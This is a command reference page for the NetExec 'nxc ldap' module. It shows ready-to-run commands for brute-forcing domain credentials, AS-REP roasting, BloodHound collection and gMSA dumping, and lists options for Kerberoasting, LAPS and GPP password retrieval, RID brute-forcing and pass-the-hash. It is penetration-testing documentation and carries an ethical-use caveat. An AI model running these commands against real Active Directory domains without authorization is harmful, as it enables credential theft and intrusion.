nxc-ldap

Search for valid domain credentials by trying out every combination in the specified lists of usernames and passwords

$ nxc ldap [192.168.178.2] [[-u|--username]] [path/to/usernames.txt] [[-p|--password]] [path/to/passwords.txt]

$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] [password] --active-users

$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] [password] --bloodhound [[-c|--collection]] [All]

$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] '' --asreproast [path/to/output.txt]

$ nxc ldap [192.168.178.2] [[-u|--username]] [username] [[-p|--password]] [password] --gmsa

nxc ldap TARGETS [OPTIONS]

TARGETS can be a single IP address, a comma-separated list of IPs, a CIDR range, a hostname, or a path to a file containing a list of targets.

--users
    Enumerate domain users.

--groups
    Enumerate domain groups.

--computers
    Enumerate domain computers.

--asreproast
    Attempts to perform AS-REP Roasting against eligible user accounts.

--kerberoast
    Attempts to perform Kerberoasting against eligible Service Principal Names (SPNs).

--gpp-passwords
    Searches for Group Policy Preferences (GPP) XML files with stored passwords.

--bloodhound
    Dumps data for ingestion into BloodHound for attack path analysis.

--laps
    Attempts to dump LAPS (Local Administrator Password Solution) passwords if permissions allow.

--rid-brute START_RID END_RID
    Brute forces RID numbers to find valid accounts within a specified range.

-u USERNAME
    Specifies the username for authentication.

-p PASSWORD
    Specifies the password for authentication.

-H HASH
    Specifies an NTLM hash for pass-the-hash authentication.

-d DOMAIN
    Specifies the domain name for authentication.

--no-bruteforce
    Prevents nxc from attempting to brute force credentials (useful with provided credentials).

--continue-on-success
    Continues enumeration and exploitation attempts even after successful authentication or initial compromise.

--threads NUM
    Sets the number of concurrent threads to use for operations.

nxc-ldap is a module of NetExec (formerly CrackMapExec, or CME), a powerful post-exploitation framework designed for penetration testers. It specializes in interacting with LDAP (Lightweight Directory Access Protocol) services, primarily found in Active Directory environments. This module allows security professionals to enumerate various Active Directory objects such as users, groups, and computers, identify misconfigurations, and exploit vulnerabilities like AS-REP Roasting or Kerberoasting to gain credentials or further insights into the domain.

nxc-ldap is used for reconnaissance, privilege escalation, and lateral movement within Windows domains by leveraging authenticated and unauthenticated LDAP queries. It streamlines the process of gathering critical domain information, making it an indispensable tool for AD security assessments.

• Ethical Use: nxc-ldap is a powerful tool designed for authorized security assessments. Unauthorized use against any system is illegal and unethical.
• Network Impact: Enumeration and exploitation activities can generate significant network traffic and potentially trigger security alerts or IPS/IDS systems.
• Permissions: Many advanced features (e.g., LAPS dumping, sensitive attribute enumeration) require specific elevated permissions within the Active Directory domain.
• Dependency: Requires Python and the NetExec framework to be installed.

nxc-ldap supports various authentication methods, including username/password, NTLM hashes (pass-the-hash), and unauthenticated access for specific queries. This flexibility is crucial for different testing scenarios.

While nxc-ldap focuses on LDAP, nxc itself is modular, allowing seamless integration with other protocols like SMB, WinRM, and RDP for a comprehensive assessment.

nxc (NetExec) is the successor to CrackMapExec (CME), a popular penetration testing tool initially developed by @byt3bl33d3r. CME gained significant traction for its versatile capabilities in enumerating and exploiting various network services, especially within Windows domains. The transition to NetExec (NXC) aimed to address maintenance issues and community support, continuing its legacy as a go-to tool for red teamers and pentesters. The ldap module has been a core component since its early days, continuously updated to include new attack techniques and enumeration methods relevant to Active Directory security.

ldapsearch(1), crackmapexec (n/a), impacket (n/a), bloodhound (n/a), secretsdump.py (n/a)